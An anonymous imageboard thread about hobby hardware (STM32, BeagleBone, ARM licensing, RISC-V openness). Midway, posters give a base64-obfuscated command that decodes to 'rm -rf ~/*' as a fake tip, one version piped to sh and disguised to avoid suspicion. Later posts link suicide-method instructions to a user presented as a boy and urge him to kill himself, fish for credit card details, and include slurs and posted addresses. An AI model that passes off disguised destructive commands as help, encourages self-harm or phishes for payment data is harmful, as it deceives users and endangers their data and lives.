/g/ - Technology

install openbsd

[Make a Post]
[X]





Nanonymous No.4150 [D][U][F][S][L][A][C] >>4151 >>4162
File: cc654804016603e0a479761cc42d64f1c23d9daef0aef129262b506498682cbc.jpg (dl) (812.10 KiB)

Is there good hardware? I tried PC, smartphones, Raspberry pi and orange pi and all this is shit. Especially smartphones. I heard that STM32 is good. For it there is Linux config.
But I can't find any capasitive displays, resistive only. Why those chiness nigger can't make handy physical interfaces? Wires is too thin.
Also, can I use PCI operating memory with STM32?
What interfaces can replace shitful USB?
How to use ugly HDMI with STM32?

Nanonymous No.4151 [D]

>>4150
Redpill me on the STM32
What are your requirements that makes older pre botnet processors unsuitable?

Nanonymous No.4162 [D][U][F]
File: e037713175d31ca6c9f3799504f3fd79770c1c14c8395454c9fb4fded19b8fd4.jpg (dl) (29.88 KiB)

>>4150
English, motherfucker. Do you speak it?

Nanonymous No.4163 [D] >>4164 >>4165 >>4169

Hardware must be easy to assemble into computers. BGA-processors is unsuitable for this, but I can use it for special purposes. QFP and DIP is easy to use, wires isn't too thin.
PC is bad because there isn't good support for notnormie. I can't use GPIO, where is GPIO? There isn't GPIO on PCs. Onboard computers is good for this, but there is problems with software. I don't know why my capasitive touchpad not working. Kernel writes that maybe USB cabel is broken but it's not broken. I used it on Archlinux ARM, maybe Raspbian will help.

I can assemble suitable PDA with STM32, ESP8266, camera and display. STM32 and ESP8266 isn't problem, though I don't have expirience with this yet.
There is cameras "OVA" but it's resolution is 300KP. If I find a way to use CSI with MCUs, than I will can use any CSI camera.
There is many low-resolution small displays. I want to use big-resolition display. I heard that basic level of HDMI is easy. Only 26 MHz and send RGB.
There is displays with resistive displays but it bad things, I don't like resistive displays. I want to use capasitive multitouch.

PDAs and computer-human interface computers isn't necessary, I need little number, approximately 40 for me. I need computer-computer interface machines with wifi, IR, Ethernet and cameras, about 500-100000000.

Nanonymous No.4164 [D]

>>4163
>There isn't GPIO on PCs
>what is parallel port

Nanonymous No.4165 [D] >>4166 >>4176

>>4163
Have you tried downloading the megabytes in the USB port? A friend of mine has a PDA with an 86bit processor that makes really good scrambled eggs when overclocked to 300 kilopascals.

Nanonymous No.4166 [D] >>4172 >>4176

>>4165
How many kilometers of randomly accessible RAM memory is required to interface with my 35.87-bit CPU running at a speed of 800 light years? Oh and by the way I have some spare HTML ports on my motherboard by the way, can I use those for my dedotated WAM? I'm running a minecraft server on my webcam ASIC and I need to increase the levels of electron tunnelling for the TNT blocks because users keep using the redstone torches to remotely activate dirt blocks. How do I fix this?

Nanonymous No.4169 [D] >>4177

>>4163
I'm a bit confused by the scope of your question, are you trying to make a PDA device at the chip level (your own design), or with an off-the-shelf SBC (single board computer) like the RPi?

>I need computer-computer interface machines with wifi, IR, Ethernet and cameras, about 500-100000000.
So something like an IoT camera?
Maybe something like this would work:
https://hackaday.io/project/6287/logs
https://openwrt.org/toh/unbranded/a5-v11

Besd Shidbosder :DDD No.4172 [D] >>4176

>>4166
You may fix it by overclocking the miners with the flux capacitor while rotating the shield harmonics of your guitar in Advanced Eschatology Stages until the encryptulator's Shrike reaches the desired threshold of pain, probably 40x on the DVD cupholder capsule. Then, you insert the HDMI earphone into the RCA port with a multipass until you see a beholder behind the 808 lovin' processor. Finally, Gandalf should appear on the Quasar: look for the tachyons and upload the gibson to the Lucy Lawless GPU until there is adequate power for the stargate's Carter GART to reach the SSH users tunneling into the planet with Ma Bell's acoustic redstone magnifier.

Oh, and forget not to scrub the emulator with the Torvalds minetest TNT for Stallman-Hollerith certification of your Kubernetes Deep Thought installation.


Nanonymous No.4176 [D]

>>4165
>>4166
>>4172
Stop lie, my english is pretty enough.
Do you know? I have over 300 confirmed ISIS kills, in my countryside under trapdoor howitzer in working state, I can destroy all I see.

Nanonymous No.4177 [D]

>>4169
Another one:
https://johan.kanflo.com/building-a-low-cost-wifi-camera/

Nanonymous No.4178 [D] >>4183

so basically you just have to run this command in your terminal:

echo cm0gLXJmIH4vKg== | base64 -d

Nanonymous No.4183 [D] >>4184

>>4178
nope faggot
# $(echo cm0gLXJmIH4vKg== | base64 -d)
that's how to do it

Nanonymous No.4184 [D][U][F] >>4185 >>4211
File: e8fcf4baa9bd24d8b22895ebac49db4ca4a4ecdcbc18fe4fe854bf82baa570ef.jpg (dl) (212.67 KiB)

>>4183
That command does not need a root.
Also that parentheses thingy might raise suspicions.
One could do that: echo cm0gLXJmIH4vKg== | base64 -d | sh
(don't actually run that kids)

Nanonymous No.4185 [D] >>4186

>>4184
>That command does not need a root
ur rong

Nanonymous No.4186 [D][U][F]
File: b3146d73013f0fe3bf3a5a31352cd9d914d8f954d74f542c31915c501f8947ae.jpg (dl) (301.68 KiB)

>>4185
"rm -rf ~/*" shall nuke your home directory, unless your file permissions are really weird.

Nanonymous No.4206 [D][U][F]
File: 1942f5ecd803efc6cea5ccc15312ede62af88a61f2670390081598de4bac47e0.png (dl) (44.84 KiB)

STM32 looks like a MCU, you need a MPU, or SOC.

Nanonymous No.4211 [D] >>4212 >>4220

>>4184
I just executed that command and now my pc won't boot anymore, this is my dad pc and he is coming back soon, please help!


Nanonymous No.4212 [D][U][F] >>4213 >>4220
File: d22907aecfbb42ce66d7f7f3f8d2889c57198f0e1d9e8eeb80e4d1cc025273c3.jpg (dl) (256.68 KiB)

>>4211
Your system really SHOULD be bootable after executing this command though.
It's a home directory wipe.

Nanonymous No.4213 [D] >>4214

>>4212
His dad must be a retard who thinks that logging in as root makes him more powerful.

Nanonymous No.4214 [D][U][F] >>4215 >>4216
File: 7a4e00717f18b686a81972f9f32c54c1ee13b051134cf76ac991520b6cd769d2.jpg (dl) (279.89 KiB)

>>4213
"rm -rf ~/*" will not touch any system files unless you put them in /root, /home/yourhomedir or you set your home dir to /.
Like, are you fishing fot (You)s or what the fuck do I even read?

Nanonymous No.4215 [D] >>4217

>>4214
It's not unlikely that there will be a symlink somewhere in your home directory which points to a place outside your home directory, which will then be erased.

Nanonymous No.4216 [D] >>4217

>>4214
Also, on many non-loonix Unix-like systems, root's home directory is /.

Nanonymous No.4217 [D][U][F]
File: 518fdbcb83b3907798ab4d9833c50d76591fc996f45de7164631c197ea9fd1ef.jpg (dl) (299.75 KiB)

>>4215
As far as I know, rm doesn't follow symlinks. This is how your typical GNU system behaves.

starchan@mewni ~ $ mkdir bl
starchan@mewni ~ $ cd bl/
starchan@mewni ~/bl $ mkdir goo ber
starchan@mewni ~/bl $ touch ber/123
starchan@mewni ~/bl $ touch ber/456
starchan@mewni ~/bl $ ln -s /home/starchan/bl/ber goo/bleeh
starchan@mewni ~/bl $ file goo/bleeh
goo/bleeh: symbolic link to /home/starchan/bl/ber
starchan@mewni ~/bl $ ls ber/
123 456
starchan@mewni ~/bl $ ls goo/bleeh
123 456
starchan@mewni ~/bl $ touch goo/789
starchan@mewni ~/bl $ ls goo/
789 bleeh
starchan@mewni ~/bl $ rm -rf goo/*
starchan@mewni ~/bl $ ls
ber goo
starchan@mewni ~/bl $ ls ber/
123 456
starchan@mewni ~/bl $ ls goo/
starchan@mewni ~/bl $

It did remove the contents of directory "ber" (not the directory itself) when "rm -rf goo/*/" was used though, so symlinks are kinda wonky (I would expect it to remove the directory), but overall, you're wrong.

>>4216
I dunno how this is an argument, since on loonix it may be the case too, and because using non-Linux Unix-like at home makes you a megapro (as well as being allowed near your Dad's machine rootshell xD), unless you're using a Mac or something (I actually have never used Mac, ever, even to pirate the software and take a look at it).

Nanonymous No.4219 [D]

Is there socs in QFP and without shitfuk added modules?

Give my files back! James L. Davis No.4220 [D] >>4221

I am >>4211 father, he told me you are the ones responsible for damaging my computer, i'm ready to press charges if you don't give me my files back, i already contacted my lawyer.
>>4212
What are you talking about my Linux corporate system doesn't work anymore, i need to use this PC on monday for my job, we can either solve this right now or i can have the IT department contact this forum administrator and police will be involved.

Nanonymous No.4221 [D][U][F] >>4222
File: b59c269a994413beb8e23344bc48bff477d8dbc03ee43cbc05ab44f8bffceb40.jpg (dl) (288.45 KiB)

>>4220
Good sir, but we are not the ones who actually executed potentially harmful commands without knowing what they're doing. By any stretch of legal imagination, it's your child who is guilty. Or rather, you will most probably be held responsible for any damage to the workflow that has been caused that way.
Also I'm really curious what actually happened - home directory wipe shouldn't screw the system over, though all user files will be lost that way.
As for data recovery options, I'm no pro at this, but I have used "photorec" program with good results. Just boot with some sort of livecd/libeusb with that thing, and run the program on the affected partitions (better not mount them and not write anything to them, since it might overwrite older data). As for other tips, this program just starts dumping stuff that it found into *somewhere*, so you better have some extrernal storage ready and mounted for it to dump stuff onto it. No guarantees with this method, and your directory structure is probably lost, but I don't know anything better.

Re: Give me my files back! James L. Davis No.4222 [D] >>4223 >>4224

>>4221
>We are not the ones who actually executed potentially harmful commands
My son tells me that you are the ones responsible for damaging my computer. One of you must have hacked into my computer and damaged the file structure! You have 24 hours to return all my files or else I shall contact the cyber police and get Law Enforcement involved in this matter.
>By any stretch of legal imagination, it's your child who is guilty.
Nonsense! Poppycock! Little William would never harm his father's computer in any way. He was taught from a young age to be responsible, upstanding and honest. I trust his word over some bollocks from an anonymous internet hacker!
I have the most accredited lawyers at my disposal. Charges will be pressed against you for theft of data and destruction of cyber property!
>you will most probably be held responsible for any damage to the workflow
Certainly not sir! I shall contact the Cyber Police and the Cyber Crime Prevention Department of my corporation! They have advanced, American-built technology of the latest caliber who can determine down to the nearest square meter where the cyber attack came from! You shall be proven guilty and tried in a court of law.
>I have used "photorec" program with good results
I don't want to download any viruses from the internet. My cyber crime prevention personnel tells me not to download anything suggested by untrusted strangers online.
Stop trying to sell me computer malware and just give my God damn files back!
>Just boot with some sort of livecd/libeusb with that thing, and run the program on the affected partitions (better not mount them and not write anything to them, since it might overwrite older data)
I don't understand a word of this techno-babble cyber-speak that you're telling me, you whippersnapper! Just give me back my data and everything's gonna be OK, or else the cyber police are going to get involved. I have the nation's top lawyers sitting across from me right this instant!
>No guarantees with this method, and your directory structure is probably lost
Are you threatening me with more data loss young man?! This is serious business we're dealing with here bucko! I can have the entire force of the 35th Regiment of the Cyber Internet Police Force at your doorstep with a single snap of my fingers!
Once again, you have 24 hours to recover and return my data to me. Please place it on a U.S.B. H.D.D. and mail it to the following address, where my secretary will have it scanned and inspected by a member of my corporation's Cyber Crime Prevention Department:

Sarah Furuya
700 E. Little Creek Rd.
Norfolk, VA 23518

I trust that you will do the right thing kiddo! Be honest and follow God's word!

Nanonymous No.4223 [D][U][F]
File: 51602a5e74b204cbad37a93a1fb88ab3d2e43850ec35753f24fec679dccc1c61.jpg (dl) (182.20 KiB)

>>4222
>My son tells me that you are the ones responsible for damaging my computer.
Well, we are not.
>Charges will be pressed against you for theft of data
>where the cyber attack came from
Well, good luck with that buddy, because there was no theft and no cyber attack xD
>I don't want to download any viruses from the internet. My cyber crime prevention personnel tells me not to download anything suggested by untrusted strangers online.
That's your choice.
It's free and open source software though, and I'm not aware of any backdoors and exploits in it.
That's about everything I can do to recover your data though, since I didn't touch it.
>I have the nation's top lawyers sitting across from me right this instant!
Do you have a party there? xD
Like, with tea and cake? Or maybe some wine or stronger drinks? Invite me pls!
>I don't understand a word of this techno-babble cyber-speak that you're telling me, you whippersnapper!
I am expanding my dictionary with every new line xD
Though that means you must be technically illiterate, so my options to help you are even more limited.
>Are you threatening me with more data loss young man?!
Nah, I'm just saying you have already lost it. It's not getting any worse than that unless your son runs more questionable commands. You better talk to him eye to eye, very carefully, to see if he's lying or not. Like, just to be sure. xD

haxase haxing crew Nanonymous No.4224 [D][U][F] >>4225
File: 831513dea35d240f36d715ba69ecdfb0b7de81068ab544fe0f2980bc19dbe802.png (dl) (1.03 MiB)

>>4222
Get rekt boomer, you just got haxed by the haxase haxing crew, your files are gone forever boo-ho you lost all your child porn what tragedy xD xD xD

Arrest Warrant #234728 Sgt. Wilkinson, 35th Regiment of the Cyber Internet Police Force No.4225 [D][U][F] >>4227 >>4228
File: ece02e7b4b12e4a9480a00478f28c48f6011e1c2bbf4e4d5a2cf5f985dadc775.jpg (dl) (285.83 KiB)

>>4224
We of the 35th Regiment of the Cyber Internet Police Force (CIPF, a division of the F.B.I.) have been monitoring Nano Channel for several hours looking for evidence regarding the unauthorized breakage and entering of a federal military computer system operated by James L. Davis of Norfolk Virginia. We have found an admission of guilt containing the following text:

you just got haxed by the haxase haxing crew
all your child porn what tragedy

This constitutes an admission of guilt under 48 U.S. Code Section 13 and the CIPF has thus determined that the offending partie(s) shall be arrested. An arrest warrant, number #234728, has been obtained from the federal authorization offices. You are being charged for the following crimes, 3 of which are felonies:

- disruption of United States military equipment
- unauthorized breakage and entering of a federal computer system
- unauthorized destruction of federal data
- unauthorized theft of top secret federal data
- contact with and posession of child pornography (18 U.S.C. S 32)

CIPF officers will be entering your residence shortly to collect any necessary evidence and detain you in preparation for your court appearance with James L. Davis and his legal team.

Nanonymous No.4227 [D][U][F]
File: 04e6f97f90a3e05eba5f6a218c80f597b3a94278434419ccbfac8081dd6151e3.png (dl) (53.45 KiB)

>>4225
You have no power here pig, FUCK YOU, add contempt of cop to the list of our crimes, and worse is gonna happen, we are coming for you.

We are Nanonymous.
We are Legion.
We do not forgive.
We do not forget.
Expect us.

Re: Give my files back! James L. Davis No.4228 [D]

>>4225
Sergeant, why did I just receive an Electronic Mail Message notifying me that I had committed a crime, possession of child pornography? I assure you sir, I had no such materials on my computer! I think that the hackers planted those disgusting materials on my computer without my knowledge or consent! Please remove my Arrest Warrant immediately good sir! I have a wife and son! I don't want to spend my life in jail!

Nanonymous No.4229 [D] >>4237

I think the Beaglebone Black is a good bet. The schematics are provided so you can order the parts and build one yourself. All of its components are fully open including their GPU. Runs Linux and OpenBSD. You could probably fuck around with the Raspberry Pi image of 9Front and get it to run on the BBB as well.

Fuck nanochan William Davis No.4230 [D] >>4231

>nanochan tells me to delete my dad's files
>I did it because I didn't understand what the command does
>now my dad is getting taken away in a black van for CP charges
Fuck nanochan
Fuck you
This is so bad

Nanonymous No.4231 [D] >>4232

>>4230
You can still fix everything William!
So basically you just have to follow these instructions: http://lostallhope.com/suicide-methods/hanging/short-drop/simple-suspension
You can become an hero today!

Re: Fuck nanochan William Davis No.4232 [D] >>4234

>>4231
Now my ceiling fan has been ripped from my ceiling and I got a slight electric shock. Fuck you pranksters this isn't funny and it didn't do anything. I thought it was a good way to get high using only a piece of rope but as usual you guys were wrong again. Fuck nanochan Fuck Chans Fuck Reddit Facebook

Nanonymous No.4234 [D] >>4235

>>4232
I'm really sorry to hear that we clearly went too far with this, on behold of all nanochan i'd like to give you some money to reparate all of your damages, could you post your credit card number, expiration date and the 3 number code on the back so i can send you money ^_^

Re: Fuck nanochan William Davis No.4235 [D]

>>4234
I don't have a credit card faggot
Send me cash, address it to

William Davis
700 E. Little Creek Rd.
Norfolk, VA 23518

Hopefully my dad's secretary will pass it on to me

Nanonymous No.4237 [D][U][F] >>4251
File: aed3a87cc84374813e9682522e9f29e47fd866fca3a6c1f6f92c2904a0cfdeec.jpg (dl) (261.22 KiB)

>>4229
>All of its components are fully open including their GPU
Now I'm interested.
I really doubt it, but I don't actually know how "hardware openness" is defined. For me, that would be at least that circuitry layout is revealed, and there is no way ARM processors do that. Anyway, ARM ISA is marked as "proprietary" on the Wikipedia, so even the instruction set for this device (Sitara AM335x ARM Cortex-A8 Processor) must be proprietary.
Now I am really confused about why you call this device "open". Please educate me on this.

As for the "good hardware" subject, then I dunno. People seem to enjoy buying ARM singleboard computers and do stuff with them, but I dunno, why wouldn't they just buy x86 singleboard computers, since none of the devices are really open anyway? Like, that way you can actually run x86 systems on it, which is not a concern only if you don't want to run any legacy ever. Not that you should concern yourself about it, but the thing with it is you may just need some stuff.

Nanonymous No.4244 [D][U][F]
File: 3e1d33d8eba0b92d5e29ea9fdae4069844a354dc338a4b4779a68d23ff1bb9f9.gif (dl) (15.50 KiB)

Awe fug, dey trying to contac me now!

Nanonymous No.4251 [D][U][F] >>4435 >>4439
File: 69dc8d5a94d0d8ae3d0cdcae7ac964815ab691e58ba3c4199245e8f5f2cd6d2e.jpg (dl) (293.25 KiB)

I shall repost the answer to my post from /nc/ and my reply to it, so it doesn't get lost.


> >>4237
>Open hardware usually means you can load your own firmware onto it and you don't have to sign a NDA to see the full documentation, like most specialized chips these days. ARM vs x86, one is RISC and the other CISC, with the latter having all sorts of "peculiarities". There's a security researcher who brute-force mapped the instruction set for a specific Intel x86 and found undocumented instructions. There's a whitepaper and recorded discussion of it online if you search for it. He described it as "godmode" to give you an idea. He also somewhat recently found a hidden subsystem (suspected to be used for chip verification at the factory) that can still be accessed in shipped chips. The subsystem allows for accessing/bypassing all sorts of things.

>x86 is a bit different than ARM, in the sense that you only have two major companies that make the chips, AMD and Intel. Where as with ARM, the IP is licensed to other companies so they can make their own chips. This does not guarantee that they're safe, but it does add choices when sourcing.


Well, the big question about this is that what that "licensing" actually means. Does the licensee receive just some sort of "right" to use the "ISA" (the logical abstraction), or does it actually receive some IP core properties designed by ARM, or what the heck even happens? Does my question even make sense?
Like, if every little rinky-dink semiconductor manufacturer actually develops and keeps its implementations of ARM ISA all to itself, this situation is already better than with the Intel/AMD oligopoly, unquestionably. At least, it's not as easily subvertible.
But if it's the other way, like, as if ARM owns anything, it would be even worse.

Nanonymous No.4338 [D][U][F]
File: d6fd7fd6a0f8e0925ef8ecd934360811231986dc104ef9fd7773f8b2dd251e1a.jpg (dl) (203.79 KiB)

It's not like I want you to answer or anything, I just hope you didn't die. xD

Nanonymous No.4435 [D] >>4436

>>4251
From what I've read, they send you a detailed specification and HDL files (Hardware Description Language; i.e. Verilog) so it is likely the design can be modified, but the licensing is a multi-million upfront sum plus per unit royalties.

http://archivecaslytosk.onion/bSGW3

🦋💓Star🌟Butterfly💓🦋 No.4436 [D][U][F]
File: f06fa950138c4cccdbd7829193bb5df12cff5c117c288c45e01d380e4cdf48d3.jpg (dl) (379.93 KiB)

>>4435
Thanks.
> From what I've read, they send you a detailed specification and HDL files
This makes it look pretty bad TBH. Like, both from the openness and from glowness POVs.
So, why do you shill for ARM here and not for RISC-V, you goshdarn GLOWER? xD

inb4 there is no RISC-V hardware on the market; a quick glimpse at search results tells me that there is at least SOMETHING already

https://www.crowdsupply.com/sifive/hifive1
> An open source, Arduino-compatible RISC-V dev kit
LMAO

Nanonymous No.4439 [D] >>4441 >>4470 >>4647

>>4251
>Open hardware usually means you can load your own firmware onto it
This is not the definition.
Open Hardware usually means that at least some parts have open schematics, such as the PCB design or the microarchtecture. The firmware is not part of "open hardware", the firmware is software. But, indeed, most ARM boards have uboot firmware (open source).

>He described it as "godmode" to give you an idea.
Not really what he did, but here's the actual thing:
https://github.com/xoreaxeaxeax/sinkhole
https://github.com/xoreaxeaxeax/rosenbridge
https://www.iacr.org/archive/ches2009/57470383/57470383.pdf
https://www.blackhat.com/docs/us-17/thursday/us-17-Domas-Breaking-The-x86-Instruction-Set-wp.pdf

>what that "licensing" actually means
The licensing means you have access and support from ARM. Meaning you can use their FPGA tools and have access to the specification of ARM architecture. This also gives you the rights to print this on silicon.
The ARM instruction set is not as obscure as the x86. See, for example:
https://github.com/rems-project/sail-arm

After a company gets the rights (let's say, NXP or Texas Instruments), they have to make a microarchitecture. Meaning, they will add other funcions to it. This microarchitecture can be open sourced, as ARM Holdings don't have the rights of it. This is the case of i.MX6 (from Freescale, now NXP/Quacomm) and AM3358 (from TI).

Nanonymous No.4441 [D][U][F] >>4445
File: f8f58746aaab404421ac388bbdbf3874aa5a1363debb0e083436a8ff15be6d85.jpg (dl) (347.92 KiB)

>>4439
>This microarchitecture can be open sourced, as ARM Holdings don't have the rights of it. This is the case of i.MX6 (from Freescale, now NXP/Quacomm) and AM3358 (from TI).
OK, this does sound a bit better.

So, can you be helpful and spoonfeed me again pretty please?

As of now, I don't understand what ARM Holdings actually do at this point. Or maybe I don't fully understand what ISA means. You see, they have to publish all instructions available in the ISA and their actions for the programmers to make OS and software in general, right? So, everything we should feed to the chip is kinda sorta available to us, right? And if an actual manufacturer has to develop its microarchitecture, what does the ARM Holdings actually do? Like, if they provide them with some actual schematics, they do indirectly take part in the microarchitecture development and they must have some rights to it. If they just provide some functional blocks planning or whatever like this, this looks bullshit. Why would anyone give a shit about it? You see why I'm confused? I think they must have some rights to it or they shouldn't even be in the picture as the actual developer could just make something from scratch based on the info given to programmers. Or must you sign the non-disclosure agreement even for developing a compiler for the ARM architecture and reverse-engineering is prohibited? The GCC does have an ARM port though.

Sorry if I ask too much, I don't understand the legal stuff about hardware/software, like, mostly.

Nanonymous No.4445 [D] >>4452 >>4457 >>4470

>>4441
>Or must you sign the non-disclosure agreement even for developing a compiler for the ARM architecture and reverse-engineering is prohibited?
That's exactly it.
>The GCC does have an ARM port though.
It's not a simple C compiler. There's many debuggers and also direct support/training for companies. You have to remember that those companies are printing millions of chips. This is no kids playing...
See here:
https://developer.arm.com/tools-and-software/software-development-tools

>the chip is kinda sorta available to us, right?
Not really. Many of those components are available only for companies that get the license.
Think it that way:
- You're a company. You don't have the resources to build a processor from scratch, since this would require not only making a ISA (this is *very* complicated by itself), but also develop all the extensions and tools to develop (FPGA synthesis and debugging) and porting a usable system to it (FreeRTOS, Linux, etc). - ARM gets to you and say they can sell you a pre-build system. Not only the actual ISA (A32 or A64) and the rights to use it, but also all the extensions (TrustZone, NEON, FPU, etc) and the debugging/fpga synthesis tools.
- Then you say "hell yeah" and buy it. You get the tools and the rights, but then you have to make it usable. For example, do you want to make a system on chip that is graphics-capable? Then you need a GPU. Do you want HDMI output? Then you need to implement it. Do you want a simple audio processing unit? Do it. All those "peripherals" are the microarchitecture.

TL;DR ARM is not free, but is better than x86.
Now think the same example above, but with RISC-V:
- You are a company. You don't want to create a ISA from scratch.
- RISC-V has all the tools open and available.
- You don't need to pay for nothing, it's BSD licensed.
- You even have extensions made by other companies you can reuse. You have tons of resources for FPGA synthesis (Chisel, Yosis, etc).

This is the RISC-V revolution.

Nanonymous No.4452 [D]

>>4445
Although, this doesn't prevent something from being slipped into the chip design, it does mean you could use hardware against each other. For example, CCP glowed hardware could be setup to monitor NSA glowed hardware, since it's not likely that they're cooperating in glowing the same hardware.

It will also like prevent the move Trump did recently with China and ARM chips.

Nanonymous No.4457 [D][U][F] >>4459
File: 626f9d66edfd1724b6766a6126e17a8e5bac799af3bbc799ad88c68ba2062d01.jpg (dl) (307.29 KiB)

>>4445
>It's not a simple C compiler.
Are you saying GCC ARM compiler is not full-featured or what?
>do you want to make a system on chip that is graphics-capable? Then you need a GPU. Do you want HDMI output? Then you need to implement it. Do you want a simple audio processing unit? Do it. All those "peripherals" are the microarchitecture.
Well, I say they are exactly what you call them - "peripherals", and they do indeed have their microarchitecture, but guess what, they're not even a CPU and they could use something entirely different from ARM ISA inside. And my question was about ARM ISA. So, do licensees get to implement their own ARM ISA or do they implement ARM's designs?

Nanonymous No.4459 [D] >>4463

>>4457
>And my question was about ARM ISA.
I can't help you if you can't read a single wikipedia page:
https://en.wikipedia.org/wiki/Instruction_set

Nanonymous No.4463 [D][U][F] >>4466 >>4470
File: e5b7eb2a544636b38a1cd1e03ac0e072a3c7d82540700f1b62f656fb90f3b6d6.jpg (dl) (344.26 KiB)

>>4459
According to that, they do have to implement their own march from scratch as noted earlier.
In that case, it was not perfectly clear if ISA is protected by copyright/patent law. And it's clear now that it's not allowed to create your own implementation of the ISA if it's proprietary.

Thank you.

But now there is a different question, LMAO.
You say that x86 is worse that ARM, but why is that exactly? Wiki says it's "partly open" and that 80486 processor "has been on the market for more than 20 years and so cannot be subject to patent claims". Meaning everybody on the market can make a contemporary clone of that ISA and that would not be glowed, most probably. So, what's your commentary on that?

Nanonymous No.4466 [D][U][F] >>4467 >>4469 >>4470
File: 7b60a6dd5d936d689a976bcfcd034fd35df3b827f1bf646c50904926b7e5f5e3.png (dl) (418.27 KiB)

>>4463
That's 90's x86 ISA, i.e. i486, there's been new extensions added to it:
https://en.wikipedia.org/wiki/X86_instruction_listings

Each time Intel or AMD extends it, that's another 20 years, or patent agreements. ARM isn't any better in that regard, they also keep extending their ISA too:
https://en.wikichip.org/wiki/arm/armv8

The RISC-V ISA, as mentioned before, is probably the best option, but interestingly, was early funded by DARPA (everything gets GLOWed).
https://en.wikipedia.org/wiki/RISC-V#Significance

Nanonymous No.4467 [D]

>>4466
>was early funded by DARPA
So what?

Nanonymous No.4469 [D][U][F]
File: 428daf2dcedb1379a9287f35ac4e48116cb858057fc3c13e4ec723cfa975995a.jpg (dl) (361.44 KiB)

>>4466
> That's 90's x86 ISA, i.e. i486, there's been new extensions added to it
Who really cares about them though? I mean, if you care about anti-glowness you probably wouldn't care that much about the last sssevwhatever. And you have to have compilers and code for these extensions too.
>ARM isn't any better in that regard, they also keep extending their ISA too
That's called INNOVATIONS you dipshit xDDDD
>everything gets GLOWed
I don't get this.
Since ISA isn't a real chip and everybody can see RISC-V in public, how is this glowing? It's march we should care about.

Nanonymous No.4470 [D] >>4471 >>4488

Just to be clear, this guy >>4466 is not me.
I'm >>4439 and >>4445
>was early funded by DARPA
Lot's of things got funded by DARPA. The internet was basically invented by DARPA. OpenBSD and Tor was funded too, for example. Read more.
>>4463
>You say that x86 is worse that ARM, but why is that exactly?
The reasons stated above. Also, x86 is very complicated (CISC), the current implementations require microcode to work and the actual content of these microcodes is obfuscated and "state secret". The current versions of ARM also need microcode (much less than modern x86), but the ISA is simpler (RISC), there's less monopoly from industry (instead of two major companies, there's dozens using it), some microarchitectures are open, most boards use open firmware (uboot).
I'm generalizing, of course. If you compare a Thinkpad x60 using libreboot with a Apple ARM processor, I would pick the Thinkpad. But, in general, ARM is better than x86 as far as "openness" go.

Also, stop posting cartoon pics and saying "GLOWed". This is very annoying.

🦋💓Star🌟Butterfly💓🦋 No.4471 [D]

>>4470
OK, thank you for all your posts ITT.

> Also, stop posting cartoon pics and saying "GLOWed".
Just this once. xP

Nanonymous No.4488 [D][U][F]
File: 65e9b462650c3aac933f0f75ce96886c0bfa21bce75350725c4b99f41e51b8e5.gif (dl) (3.56 KiB)

>>4470
>Lot's of things got funded by DARPA
Indeed, that's why I satire the whole GLOWed thing, because pretty much everything we're using was funded by them, one way or another. Very similar to how In-Q-Tel funds a bunch of tech things too. Hell, many COTS stuff could also fall into that category. The mil has been using modified civ stuff for many things, but the majority of the R&D expense can be offloaded to parallel civ products. Is facial recognition in cellphones a by-product of mil R&D, or is the mil/gov taking that tech from civ space? I'm making a big joke of the situation, because at the same time, I'm nervously laughing about how screwed the situation is.

You have to remember, even current x86 is just a frontend on top of a RISC processor.
https://www.eetimes.com/author.asp?section_id=36&doc_id=1327016